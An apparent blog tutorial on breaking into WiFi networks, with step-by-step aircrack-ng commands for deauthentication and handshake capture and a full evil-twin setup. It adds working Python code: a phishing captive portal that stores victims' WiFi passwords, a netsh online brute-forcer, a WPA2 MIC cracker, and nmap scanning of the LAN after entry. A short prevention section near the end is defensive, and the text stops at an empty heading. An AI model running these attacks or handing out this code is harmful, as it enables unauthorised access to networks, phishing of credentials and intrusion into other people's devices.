How to Hack Wifi Like a Pro Hacker

Written by morpheuslord | Published 2021/10/25
Tech Story Tags: security | cyber-attack | cyber-security-awareness | hacking | ethical-hacking | wifi | hack-wifi-like-a-pro | hack-wifi

TL;DR: In this article we discuss the most common ways to hack a WiFi network, what an attacker can do inside the network afterwards, and what you, as a hacker or as an ordinary user, can do to prevent such attacks. The main hardware requirement is a WiFi adapter that supports monitor mode. A Raspberry Pi can serve as a small capture box and a separate computer for password cracking. The next step is to discover the target SSID; we use airodump-ng to search for targets.

In this article, we will discuss the best ways to hack a WiFi network and what we can do to avoid falling prey to WiFi hacks.

Topics to discuss.

  1. Hardware tools required.

  2. Software required.

  3. How to hack wifi.

    a. using a 4-way handshake.

    b. using evil twin attack.

    c. using direct bruteforce.

    d. using a 2-way handshake (a half handshake captured with a rogue access point).

  4. What to do after hacking wifi?

  5. How to prevent such attacks?

  6. Problems and issues faced in such attacks.

Hardware tools required.

The main hardware requirement is a WiFi adapter that supports monitor mode (and packet injection, which the deauthentication steps below need). The usual choice is an Alfa adapter, because its chipset is supported out of the box in Kali Linux and both monitor mode and injection just work.

A Raspberry Pi is useful as a small, portable capture box, but not for password cracking: cracking is CPU/GPU bound and a Pi is far too slow for it, so use a separate computer (ideally one with a GPU for hashcat) for that part.

Software requirements.

There is a wide range of software that can work for hacking WiFi. I will list a few:

  • Wifite
  • Aircrack-ng
  • Kismet
  • Reaver
  • batch_wifi_brute_forcer(windows)

These are the most commonly used tools in WiFi hacking. The first four are popular and well documented: Wifite and the Aircrack-ng suite capture WPA/WPA2 handshakes, Kismet is a passive scanner and sniffer, and Reaver attacks the WPS PIN of routers that have WPS enabled rather than the WPA passphrase itself. The last one,

batch_wifi_brute_forcer, is a Windows tool developed by TUX that drives netsh, the built-in Windows command-line utility for managing WiFi connections. I will discuss how this tool works in detail later in the article. The other tools all work by capturing the handshake into a .cap/.pcap file and then cracking it offline with aircrack-ng, hashcat, or similar tools.

Using the 4-way handshake method.

Overview:-

In the 4-way handshake method we capture the WPA/WPA2 4-way handshake, i.e. the EAPOL frames exchanged between the access point and a client when the client (re)connects. The handshake does not contain the password, but the MIC in it is computed with a key derived from the passphrase, so with a capture in hand we can test candidate passphrases offline.

A client only performs the handshake when it connects, so we force one: we send spoofed deauthentication frames to a connected client (a small denial of service), the client drops off and reconnects, and the handshake between the access point and that client is exchanged again while we are listening.

On the software side we use the tools from the aircrack-ng suite; on the hardware side we need a WiFi adapter that supports monitor mode (and packet injection, for the deauthentication).

Actual attack:-

At the start of the attack we first put the adapter into monitor mode using airmon-ng.

$ sudo airmon-ng 

The above command lists all the WiFi adapters and their drivers.

$ sudo airmon-ng start wlan0

This command puts the adapter into monitor mode. Note the interface name that airmon-ng reports (usually wlan0mon), because it can differ and the following commands use it. Running `sudo airmon-ng check kill` beforehand stops NetworkManager and wpa_supplicant from interfering with the adapter.

The next step is to discover the target SSID. (I am using an online picture here, as I can't use my own for obvious reasons; I hope you understand.)

We are using the airodump-ng module to search for the targets.

$ sudo airodump-ng wlan0mon 

The above command shows all nearby access points and, in the lower half of the output, the clients (stations) associated with each of them.

Now, after deciding on the target, note the data you need from that output: the BSSID (MAC address) of the access point, its ESSID (network name), the ENC column (WPA2 for the attack described here) and the channel (CH). You also need the MAC address of at least one connected client from the station list; that is the device we will deauthenticate.

These are the necessary pieces of information for the next step.

$ sudo airodump-ng -c 6 --bssid 00:01:02:03:04:05 -w test wlan0mon

Here we lock airodump-ng onto the target: -c is the channel the target is on (6 in this example), --bssid is the BSSID of the target access point, -w is the prefix of the output files (this writes test-01.cap in the current directory), and the last argument is the adapter in monitor mode. Leave this running; it is the process that records the handshake. Note that aireplay-ng's --fakeauth does not capture a handshake: it only associates your own card with the access point, which is useful in WEP attacks but not here.

Now, in a second terminal, force a connected client to reconnect:

$ sudo aireplay-ng --deauth 5 -a 00:01:02:03:04:05 -c 00:04:05:06:07:08 wlan0mon

--deauth 5 sends five bursts of deauthentication frames, -a is the BSSID of the access point and -c is the MAC of the client to kick (omit -c to broadcast the deauthentication to every client of that access point). When the client reconnects, the airodump-ng window shows "WPA handshake: 00:01:02:03:04:05" in its top right corner and you can stop both tools.

If you do not want to deauthenticate anyone, leave airodump-ng running and wait: you still get the handshake of the next client that connects on its own, it just takes longer.

Now crack the captured handshake, which is the easy part to set up:

$ sudo aircrack-ng -w passwords.txt -b 00:01:02:03:04:05 test-01.cap

In the above command you provide the capture file, -w is the wordlist and -b selects the network to crack when the capture contains more than one. If you are lucky the passphrase is in your wordlist and aircrack-ng prints it as KEY FOUND.

Conclusion:-

We can conclude this attack by warning you that capturing the handshake is the easy part; cracking it is what will make you depressed, and I am serious. WPA2-PSK derives its key from the passphrase with PBKDF2 (4096 rounds of HMAC-SHA1, salted with the SSID), so every candidate costs thousands of hash operations, and aircrack-ng on a CPU manages only a few thousand candidates per second. For any real wordlist, convert the capture with hcxpcapngtool and run hashcat in mode 22000 on a GPU instead.

That aside, this is an effective method to hack WiFi whenever the passphrase is weak.

Using evil twin attack.

Overview:-

In an evil twin attack the hacker sets up a fake access point with the same name as the real one and tricks the user into connecting to it; the fake network then presents a page that asks for the WiFi password, and the user types it in. The major advantage of this attack is that no password cracking is needed: you get the plain-text password instead of a hash.

Actual attack:-

For this attack we are going to do it manually, with hostapd running the fake access point. hostapd switches the adapter into AP mode itself, so the interface does not strictly need to be in monitor mode, but nothing else may be holding it: run `sudo airmon-ng check kill` first to stop NetworkManager and wpa_supplicant. You also need a second interface for the upstream internet connection (eth0 below) and, ideally, a second wireless adapter for deauthenticating the real access point, because one radio cannot host the fake network and jam the real one at the same time.

First, install the necessary packages (dsniff provides dnsspoof, used at the end):-

$ sudo apt install hostapd dnsmasq apache2 dsniff

Second, free the adapter and put it in monitor mode; airmon-ng renames it to wlan0mon, which is the name used in the configuration files below:-

$ sudo airmon-ng check kill
$ sudo airmon-ng start wlan0

Third, make a working directory in your home folder:-

$ mkdir ~/fap && cd ~/fap

Fourth, configure the hostapd.conf file:-

$ sudo nano hostapd.conf 
-----------------<nano>-----------------
interface=[INTERFACE NAME]
driver=nl80211
ssid=[WiFi NAME]
hw_mode=g
channel=8
macaddr_acl=0
ignore_broadcast_ssid=0
----------------------------------------

In the config above, set interface to the adapter you prepared (wlan0mon) and ssid to the exact name of the target network; clients match on the name, so the channel does not have to be the target's. After editing, press ctrl+x, then y, then Enter to save the file.

Fifth, configure the dnsmasq.conf file:-

$ sudo nano dnsmasq.conf
-----------------<nano>-----------------
interface=[INTERFACE NAME]
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1
----------------------------------------

Here too you only need to fill in the adapter's name. The rest means: clients get addresses from 192.168.1.2 to 192.168.1.30, option 3 makes 192.168.1.1 (us) their gateway and option 6 makes us their DNS server, which is what allows the captive portal to intercept their browsing. (A line `address=/#/192.168.1.1` would make dnsmasq resolve every name to us and could replace the dnsspoof step below.)

Sixth, give the adapter its address and route:-

$ sudo ifconfig wlan0mon up 192.168.1.1 netmask 255.255.255.0
$ sudo route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

Seventh, enable forwarding and NAT so that clients of the fake network reach the internet through eth0 (otherwise they notice immediately that nothing works):-

$ sudo iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
$ sudo iptables --append FORWARD --in-interface wlan0mon -j ACCEPT
$ echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

(`sudo echo 1 > /proc/sys/net/ipv4/ip_forward` does not work, because the redirection is done by your unprivileged shell, not by sudo.)

Start the SQL database that will store the captured passwords; password1 and password2 are the two fields of the portal's form (typically the password and its confirmation), and the final select just checks that the empty table exists.

$ sudo service mysql start
$ sudo mysql
[Database]> create database fap;
[Database]> create user 'fapuser'@'localhost' identified by 'fappassword';
[Database]> grant all on fap.* to 'fapuser'@'localhost';
[Database]> use fap;
[Database]> create table wpa_keys(password1 varchar(40), password2 varchar(40));
[Database]> ALTER DATABASE fap CHARACTER SET 'utf8';
[Database]> select * from wpa_keys;

Captive portal to trick the wifi user:-

Download a captive-portal web page of your choice; it should look legitimate (a copy of the router vendor's login page, for example), and its form must POST the entered password to a server-side script that inserts it into the wpa_keys table above.

Now put it in place in /var/www/html/ (the directory is owned by root, so the copy and the unzip need sudo as well):-

$ sudo rm -rf /var/www/html/*
$ sudo mv ~/Downloads/fap.zip /var/www/html
$ cd /var/www/html
$ sudo unzip fap.zip
$ sudo service apache2 start

Now, to start the attack, go back to the fap folder in your home directory and start the three daemons, each in its own terminal (hostapd and dnsmasq -d stay in the foreground):-

$ cd ~/fap
$ sudo hostapd hostapd.conf
$ sudo dnsmasq -C dnsmasq.conf -d
$ sudo dnsspoof -i wlan0mon

dnsspoof (from the dsniff package) answers every DNS query it sees on the fake network with our own address, so whichever site the victim opens lands on the captive portal.

Now you just need to deauthenticate the real access point, using aireplay-ng --deauth against its BSSID as in the previous section (from a second adapter, since this one is busy being the fake access point), and wait for the user to connect to you.

commands copied directly from zsecurity resources.

Conclusion:-

Once the user connects to you, they are redirected to the portal and prompted for the WiFi password; an unsuspecting user will type it in without hesitation, and it is stored in your MySQL database. Because this portal has no way to tell a wrong entry from a right one, the more serious tools of this kind (Fluxion, for example) check each submission against a handshake captured beforehand and only let the user through when the password is correct. This is a really powerful attack and makes hacking WiFi easy.
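The server side of the portal, which the article leaves to a downloaded page, as an added example that is not from the article or from zsecurity: dnsspoof sends every hostname the victim asks for to us, so the handler answers every GET with the login form and stores every POST in a wpa_keys table with the same two columns as the MySQL table above. sqlite3 stands in for MySQL so that the script runs stand-alone (the SQL is the same); the form text, the listening address 192.168.1.1 taken from the dnsmasq config, and the file name wpa_keys.sqlite are assumptions.

```python
import sqlite3
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs

# Assumed portal page; a real one would copy the router vendor's look.
FORM = """<!doctype html><html><body>
<h2>Router firmware update</h2>
<p>Enter your WiFi password to re-authenticate.</p>
<form method="post" action="/login">
  WiFi password: <input type="password" name="password1"><br>
  Confirm:       <input type="password" name="password2"><br>
  <input type="submit" value="Continue">
</form></body></html>"""


def open_db(path=":memory:"):
    # Same table as the MySQL one in the article (sqlite here so it runs offline).
    conn = sqlite3.connect(path)
    conn.execute("create table if not exists wpa_keys(password1 varchar(40), password2 varchar(40))")
    return conn


def parse_form(body: bytes) -> tuple:
    # application/x-www-form-urlencoded body -> (password1, password2)
    fields = parse_qs(body.decode("utf-8", "replace"))
    return fields.get("password1", [""])[0], fields.get("password2", [""])[0]


def store_submission(conn, password1: str, password2: str) -> int:
    # Parameterised insert: the victim's input never becomes part of the SQL text,
    # so a "password" such as ' or 1=1 -- cannot break our own database.
    conn.execute("insert into wpa_keys(password1, password2) values (?, ?)", (password1, password2))
    conn.commit()
    return conn.execute("select count(*) from wpa_keys").fetchone()[0]


def handle_submission(conn, body: bytes) -> str:
    p1, p2 = parse_form(body)
    if len(p1) < 8 or p1 != p2:
        return "retry"      # not a possible WPA2 passphrase, or the fields differ: ask again
    store_submission(conn, p1, p2)
    return "captured"


class PortalHandler(BaseHTTPRequestHandler):
    db = None   # set in main; kept off the class so importing the module opens no file

    def _reply(self, html: str, code: int = 200):
        self.send_response(code)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.end_headers()
        self.wfile.write(html.encode())

    def do_GET(self):
        self._reply(FORM)   # whatever URL the victim opened, show the portal

    def do_POST(self):
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        if handle_submission(self.db, body) == "captured":
            self._reply("<p>Thanks, your connection will resume shortly.</p>")
        else:
            self._reply(FORM.replace("<form", "<p>Passwords did not match.</p><form"))


if __name__ == "__main__":
    PortalHandler.db = open_db("wpa_keys.sqlite")
    HTTPServer(("192.168.1.1", 80), PortalHandler).serve_forever()   # needs root for port 80
```

The length check mirrors what the client itself enforces (WPA2 passphrases are 8 to 63 characters), so obviously wrong entries are bounced back to the form instead of filling the table.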

Direct Bruteforce.

Overview:-

Direct brute force is a technique I love, mainly because I have worked on the tool and secondly because it is easy to use.

It is Windows only for now and it uses the netsh command-line utility: it scans the nearby networks, and for the chosen SSID it writes a temporary WLAN profile (an XML file, which is the format netsh accepts) containing the candidate password, imports it, tries to connect, and checks whether the connection succeeded. If it did, the password was right and you are connected; if not, it moves on to the next candidate. Unlike the handshake methods this is an online attack: every guess is a real connection attempt against the access point.

Actual attack:-

I will be using the batch_wifi_brute_forcer tool, which I use personally; it works best for me and is very straightforward.

The commands are simple: enter wifiscan to scan for networks, select a network from the list shown, and then type attack.

[wifi]> wifiscan
[wifi]>( select network )
[wifi]> attack

Done, that's it. To use your own password list, put a password file in the BF_Files folder, but make sure to name it passfile.txt, as that is the default the tool reads.

Conclusion:-

This is slow and buggy, but it is accurate: there is no cracking step, because the access point itself tells you whether the guess was right. The price is that every guess is a full connection attempt that takes seconds, so it only makes sense with short, targeted wordlists, and every attempt is visible to the access point (and in its logs).

The tool can be downloaded from the batch_wifi_brute_forcer repository.
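How such a tool works, as an added example written for this article (it is not the batch_wifi_brute_forcer code): Windows only connects to a WPA2 network through a stored WLAN profile, so every guess is "write a profile XML containing the candidate, import it, tell netsh to connect, read the interface state back". The netsh invocations assume Windows with the `netsh wlan` context and only run there; the SSID, the wordlist and the sample `netsh wlan show interfaces` output are constructed so that the profile builder and the output parser can be exercised anywhere.

```python
import os
import subprocess
import tempfile
import time
from typing import Optional
from xml.sax.saxutils import escape

# Minimal WPA2-PSK profile as accepted by `netsh wlan add profile`
# (Microsoft's WLAN profile schema). {ssid} and {key} are filled in per guess.
PROFILE_TEMPLATE = """<?xml version="1.0"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
  <name>{ssid}</name>
  <SSIDConfig><SSID><name>{ssid}</name></SSID></SSIDConfig>
  <connectionType>ESS</connectionType>
  <connectionMode>manual</connectionMode>
  <MSM><security>
    <authEncryption>
      <authentication>WPA2PSK</authentication>
      <encryption>AES</encryption>
      <useOneX>false</useOneX>
    </authEncryption>
    <sharedKey>
      <keyType>passPhrase</keyType>
      <protected>false</protected>
      <keyMaterial>{key}</keyMaterial>
    </sharedKey>
  </security></MSM>
</WLANProfile>
"""

# Constructed `netsh wlan show interfaces` output (not taken from a real machine).
SAMPLE_SHOW_INTERFACES = """
There is 1 interface on the system:

    Name                   : Wi-Fi
    Description            : Wireless adapter
    Physical address       : 00:04:05:06:07:08
    State                  : connected
    SSID                   : CoffeeShopWiFi
    BSSID                  : 00:01:02:03:04:05
    Authentication         : WPA2-Personal
    Cipher                 : CCMP
"""


def build_profile(ssid: str, passphrase: str) -> str:
    # WPA2 passphrases are 8 to 63 characters; netsh rejects anything else,
    # so such candidates are filtered out before a connection attempt is wasted.
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA2 passphrase must be 8-63 characters")
    return PROFILE_TEMPLATE.format(ssid=escape(ssid), key=escape(passphrase))


def is_connected(show_interfaces_output: str, ssid: str) -> bool:
    # A successful guess shows up as "State : connected" on an interface whose
    # "SSID" line names our target. Values are split at the first colon only,
    # so MAC addresses on the BSSID/Physical address lines stay intact.
    state = seen_ssid = None
    for line in show_interfaces_output.splitlines():
        key, sep, value = line.partition(":")
        if not sep:
            continue
        key, value = key.strip().lower(), value.strip()
        if key == "state":
            state = value.lower()
        elif key == "ssid":
            seen_ssid = value
    return state == "connected" and seen_ssid == ssid


def try_passphrase(ssid: str, passphrase: str, settle_seconds: float = 5.0) -> bool:
    """One online guess (Windows only): import profile, connect, read back the state."""
    xml_path = os.path.join(tempfile.gettempdir(), "bf_profile.xml")
    with open(xml_path, "w", encoding="utf-8") as f:
        f.write(build_profile(ssid, passphrase))
    subprocess.run(["netsh", "wlan", "add", "profile", f"filename={xml_path}"], capture_output=True)
    subprocess.run(["netsh", "wlan", "connect", f"name={ssid}"], capture_output=True)
    time.sleep(settle_seconds)   # the association and 4-way handshake need a moment to succeed or fail
    result = subprocess.run(["netsh", "wlan", "show", "interfaces"], capture_output=True, text=True)
    return is_connected(result.stdout, ssid)


def brute_force(ssid: str, wordlist) -> Optional[str]:
    # Online guessing: seconds per candidate, and every attempt is visible to the
    # access point, so this only makes sense for short, targeted lists.
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:
            continue
        if try_passphrase(ssid, candidate):
            return candidate
        subprocess.run(["netsh", "wlan", "delete", "profile", f"name={ssid}"], capture_output=True)
    return None


if __name__ == "__main__":
    print(brute_force("CoffeeShopWiFi", ["password", "12345678", "coffeeshop2021"]))
```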

Using a 2-way handshake.

Overview:-

This is similar to the evil twin attack, but it is a different kind of attack and still involves password cracking. Here you trick the user's device into connecting to your own network, which has the same name as the real one, and capture the first two messages of the 4-way handshake it performs with you. The device computes the MIC in its message 2 with the passphrase it has stored for that SSID, the real one, so those two messages (the "2-way handshake", properly a half handshake) are all you need for the same offline cracking as before, and the real access point never has to send anything. We use aircrack-ng's tools to deauthenticate the user from the real network and Wireshark to filter out and save the packets we want.

Actual attack:-

In this attack we first set up a hotspot on a mobile phone with the same SSID as the network we want to hack, protected with WPA2-PSK and any password we like (the hotspot's own password does not matter, because the victim's device answers with a MIC derived from the passphrase it has saved for that name). Then, using Wireshark and aircrack-ng, we filter the packets out and crack them.

First:-

Put your wifi adapter on monitor mode.

$ sudo airmon-ng start wlan0

Second:-

We need to discover your mobile hotspot.

$ sudo airodump-ng wlan0mon
(this shows all nearby networks and access points)

From the output, note the channel your hotspot is running on and its BSSID and ESSID, then continue with the following steps.

Third:-

We need to start deauthenticating the real network so that people are disconnected from it and, with the real network unavailable, their devices connect to your hotspot instead; at the same time we start Wireshark listening on the hotspot's channel. For this example I am using channel 10.

$ sudo airodump-ng wlan0mon -c 10 & wireshark

airodump-ng locks the adapter onto channel 10 (otherwise it keeps hopping and misses frames); start the capture on wlan0mon inside Wireshark. Now search for the beacon frame that carries the ESSID of your hotspot, open it, copy its transmitter address (the hotspot's BSSID), and enter it in this filter to see only the frames going to or from your hotspot:

wlan.addr == <transmitter address>

After this you can see all the incoming and outgoing packets of your hotspot. In a second terminal, deauthenticate the victim from the real network with aireplay-ng --deauth as in the 4-way handshake section.

Once the victim's device tries to connect to your hotspot, Wireshark captures the exchange. Enter the following filter to keep only the key exchange between your hotspot and the victim:

eapol && wlan.addr == <transmitter address>

This leaves the EAPOL frames; message 2 of them carries the MIC computed with the real network's passphrase.

Now save the capture in pcap format with File > Export Specified Packets, choosing the displayed (filtered) packets. aircrack-ng takes the network name from a beacon, so either add `|| wlan.fc.type_subtype == 0x08` to the filter so that the hotspot's beacons are exported as well, or pass the name with -e when cracking.

Cracking is then the same as before: feed the .pcap to aircrack-ng or hashcat. (RainbowCrack and ophcrack are for Windows password hashes and are of no use here; precomputed tables do not work against WPA2 in general, because the key derivation is salted with the SSID.)
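What aircrack-ng and hashcat actually do with the capture, for both the 4-way handshake section and this one, as an added example that is not part of the original article: it derives the keys the way 802.11i specifies and tests candidate passphrases against the MIC of handshake message 2. Only message 1 (the ANonce from the access point) and message 2 (the SNonce and MIC from the client) are used, which is exactly why the rogue-AP half handshake of this section is enough. The network name, the addresses, the nonces and the EAPOL frame are constructed here (the MIC is generated with a known passphrase) so that the script runs offline; against a real capture you would read those fields from the pcap.

```python
import hashlib
import hmac

# Constructed "capture": the article's example addresses and a made-up network.
SSID = "CoffeeShopWiFi"
AP_MAC = bytes.fromhex("000102030405")        # BSSID (authenticator address)
CLIENT_MAC = bytes.fromhex("000405060708")    # station (supplicant address)
ANONCE = hashlib.sha256(b"constructed anonce").digest()   # nonce from message 1
SNONCE = hashlib.sha256(b"constructed snonce").digest()   # nonce from message 2
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # key data carried in M2
# EAPOL header (4) + descriptor type, key info, key length, replay counter,
# nonce, IV, RSC, ID (1+2+2+8+32+16+8+8 = 77) -> MIC field starts at byte 81.
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    # The 4096 iterations and the SSID salt are why cracking is slow and why
    # generic precomputed tables do not work.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(nonces)||max(nonces))
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    ptk = b""
    for i in range(4):
        ptk += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return ptk[:64]   # KCK = first 16 bytes, KEK = next 16, TK = next 16


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    # WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC field zeroed)[:16]
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_m2(snonce: bytes, mic: bytes, key_data: bytes) -> bytes:
    # EAPOL-Key message 2: descriptor type (RSN), key info (version 2, pairwise,
    # MIC bit), key length, replay counter, nonce, IV, RSC, ID, MIC, data length, data.
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x10" + (1).to_bytes(8, "big") + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + mic
            + len(key_data).to_bytes(2, "big") + key_data)
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body   # 802.1X v2, type EAPOL-Key


def check_passphrase(candidate: str, ssid: str, ap_mac: bytes, client_mac: bytes,
                     anonce: bytes, snonce: bytes, m2: bytes) -> bool:
    # One dictionary-attack step: derive PMK -> PTK -> KCK and compare the MIC.
    pmk = pmk_from_passphrase(candidate, ssid)
    kck = ptk_from_pmk(pmk, ap_mac, client_mac, anonce, snonce)[:16]
    return hmac.compare_digest(eapol_mic(kck, m2), m2[MIC_OFFSET:MIC_OFFSET + 16])


def crack(wordlist, ssid, ap_mac, client_mac, anonce, snonce, m2):
    for candidate in wordlist:
        if 8 <= len(candidate) <= 63 and check_passphrase(candidate, ssid, ap_mac, client_mac, anonce, snonce, m2):
            return candidate
    return None


def build_sample_capture(real_passphrase: str) -> bytes:
    """Constructed message 2, signed the way the client signs it with the real passphrase."""
    unsigned = build_m2(SNONCE, b"\x00" * 16, RSN_IE)
    kck = ptk_from_pmk(pmk_from_passphrase(real_passphrase, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    return build_m2(SNONCE, eapol_mic(kck, unsigned), RSN_IE)


WORDLIST = ["password", "12345678", "coffeeshop", "sunshine2021", "letmein1"]   # constructed

if __name__ == "__main__":
    m2 = build_sample_capture("sunshine2021")   # the victim's passphrase, known here only to build the sample
    print("cracked:", crack(WORDLIST, SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE, m2))
```

The whole cost of each guess is in pmk_from_passphrase; everything after it is two dozen HMAC calls. That is also why hashcat's speed advantage is entirely about running PBKDF2 on a GPU, and why a passphrase that is not in the wordlist is never found, however long the script runs.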

Conclusion:-

This is an effective method: you do not need to keep deauthenticating the real network until you happen to catch a full handshake, a simple trick to fool the user's device into connecting to yours is enough.

What you can do after hacking wifi?

Once you have gained access to the network you can reach all the other devices on it. Finding them is easy: you just need nmap to scan the entire subnet and list the open ports on the machines connected to it. For example, if a router with the gateway address 192.168.1.1 has given you the address 192.168.1.20 with a netmask of 255.255.255.0, every other device is somewhere in 192.168.1.0/24 (192.168.1.1 to 192.168.1.254), and you can list them and their services with:

$ sudo nmap -sV 192.168.1.0/24

This scans the internal network and shows the open ports on every machine connected to the access point (it takes a while, because -sV probes each open port to identify the service behind it).

After this, it is your turn to look for a vulnerable or misconfigured service and exploit it to get the most out of the person's machine.

This can be easy even for a beginner to do, as it is basic enumeration and exploitation.

I will explain how we can do this with a simple example. You can follow along in your practice setup.

Objective: search for and select your target

First find your own IP address, netmask and default gateway.

$ ifconfig
$ ip route

From this you can see which subnet you are in; for now I will assume the gateway is 192.168.1.1 and your IP is 192.168.1.20 with netmask 255.255.255.0, i.e. the network is 192.168.1.0/24.

Run this command to discover all the connected devices (a host-discovery sweep only, which is fast; on the local subnet nmap uses ARP for it when run as root, so hosts that drop pings are still found):

$ sudo nmap -sn 192.168.1.0/24

The above command lists every live host on the network.

Let's consider that our target IP is 192.168.1.10. Let's enumerate that system.

$ sudo nmap -sV -A -p- 192.168.1.10

The above command scans all 65535 TCP ports of the target, identifies the services on the open ones and (-A) adds OS detection and the default scripts, which gives you the basic information about the target system; from there you can enumerate the system further.

Accordingly, you can find the right way in and hack your target system in your practice configuration.
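The two steps above as code, as an added example that is not from the article: deriving the range to scan from your own address and netmask (which is where the earlier "192.168.1.1/100" came from, and which is not valid CIDR), building the nmap commands, and turning nmap's grepable output into a per-host list of open ports for triage. The nmap output embedded below is constructed, not a real scan; run_and_parse is what you would call on a real network.

```python
import ipaddress
import subprocess

# Constructed nmap -oG output (not a real scan), in the grepable format that
# `-oG -` writes to stdout. Tabs separate the fields of each Host: line.
SAMPLE_GREPABLE = """# Nmap 7.91 scan initiated (constructed sample)
Host: 192.168.1.1 (router.lan)\tStatus: Up
Host: 192.168.1.1 (router.lan)\tPorts: 53/open/udp//domain//dnsmasq 2.80/, 80/open/tcp//http//lighttpd/, 443/closed/tcp//https///\tIgnored State: filtered (65532)
Host: 192.168.1.10 ()\tStatus: Up
Host: 192.168.1.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.2p1/, 445/open/tcp//microsoft-ds//Samba smbd 4/\tIgnored State: closed (65533)
# Nmap done (constructed sample)
"""


def scan_network(ip: str, netmask: str) -> str:
    # 192.168.1.20 / 255.255.255.0 -> "192.168.1.0/24". strict=False drops the
    # host bits, giving the network to scan.
    return str(ipaddress.ip_network(f"{ip}/{netmask}", strict=False))


def discovery_command(network: str) -> list:
    # Host discovery only (-sn). Run as root on the local subnet, nmap uses ARP,
    # so hosts that drop ICMP are still found. `-oG -` prints grepable output.
    return ["sudo", "nmap", "-sn", "-oG", "-", network]


def service_scan_command(host: str) -> list:
    # All 65535 TCP ports with service/version detection on the chosen target.
    return ["sudo", "nmap", "-sV", "-p-", "-oG", "-", host]


def parse_grepable(output: str) -> dict:
    """Map every host seen to its list of open (port, protocol, service) tuples."""
    hosts = {}
    for line in output.splitlines():
        if not line.startswith("Host:"):
            continue
        fields = line.split("\t")
        ip = fields[0].split()[1]
        hosts.setdefault(ip, [])          # a "Status: Up" line registers the host
        for field in fields[1:]:
            if not field.startswith("Ports:"):
                continue
            for entry in field[len("Ports:"):].split(","):
                # port/state/protocol/owner/service/rpc info/version/
                parts = entry.strip().split("/")
                if len(parts) >= 5 and parts[1] == "open":
                    hosts[ip].append((int(parts[0]), parts[2], parts[4]))
    return hosts


def run_and_parse(cmd: list) -> dict:
    return parse_grepable(subprocess.run(cmd, capture_output=True, text=True).stdout)


if __name__ == "__main__":
    net = scan_network("192.168.1.20", "255.255.255.0")
    for ip in run_and_parse(discovery_command(net)):
        print(ip, run_and_parse(service_scan_command(ip)).get(ip, []))
```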

Disclaimer/warnings:

If you don't want to see yourself in jail for 3-10 years without the option of bail, and another year with no electronics with internet access, don't do things that can harm you or others; learn hacking, but ethically. For me, the second option, no electronics with internet, is the one that scares me the most.

How to prevent such attacks?

To prevent such attacks, the most basic thing you can do is use a long and complex WiFi passphrase: every attack above except the evil twin ends in a dictionary attack, and a long random passphrase is simply not in any wordlist. If you have high-priority work on your system, a long passphrase costs you nothing and protects you from your boss's anger over lost classified data. If your router and clients support it, switch the network to WPA3 (SAE), which makes a captured handshake useless for offline cracking, enable protected management frames (802.11w), which makes the deauthentication step fail, and turn off WPS, which is what Reaver attacks. Against the evil twin the only real defence is the user: a WiFi network never asks for its password on a web page.

On the network side, enable client isolation (AP isolation) on the access point so that connected devices cannot talk to each other, and keep IoT and guest devices on a separate network, so that an attacker who does obtain the password cannot reach your machines from it.

On the personal computer side, reduce the services you expose on the LAN, keep the host firewall on, and update the services to the latest patched version.

These are the most basic levels of prevention you can follow; there are more advanced ones, but I don't want to eat your head by making this article even longer.
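The settings that defeat these attacks, as an added example that is not from the article: the hostapd.conf format from the evil twin section is reused here for a legitimate access point, with the weak settings (commented out) beside the hardened ones. Interface, SSID, channel and the passphrase are placeholders; the hardened set assumes hostapd built with SAE support and clients that speak WPA3.

```ini
interface=wlan0
driver=nl80211
ssid=[WiFi NAME]
hw_mode=g
channel=6

# Weak (what the attacks in this article rely on):
#   wpa=2
#   wpa_key_mgmt=WPA-PSK       -> handshake can be captured and cracked offline
#   wpa_passphrase=password1   -> short, and in every wordlist
#   ieee80211w=0               -> forged deauthentication frames are accepted
#   wps_state=2                -> WPS PIN can be brute-forced with Reaver

# Hardened:
wpa=2
rsn_pairwise=CCMP
# WPA3-SAE: every password guess needs a live exchange with the AP, so a
# captured handshake gives the attacker nothing to crack offline.
wpa_key_mgmt=SAE
sae_password=a long random passphrase made of several unrelated words
# Management frame protection required: clients ignore spoofed
# deauthentication/disassociation frames, so the handshake cannot be forced.
ieee80211w=2
# WPS disabled.
wps_state=0
```

Mixed networks can run `wpa_key_mgmt=WPA-PSK SAE` with `ieee80211w=1` so that old clients still connect, but then the WPA2-PSK path, and with it the offline attack on the passphrase, remains available to anyone who captures a handshake from one of those clients.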

Problems faced during these attacks.

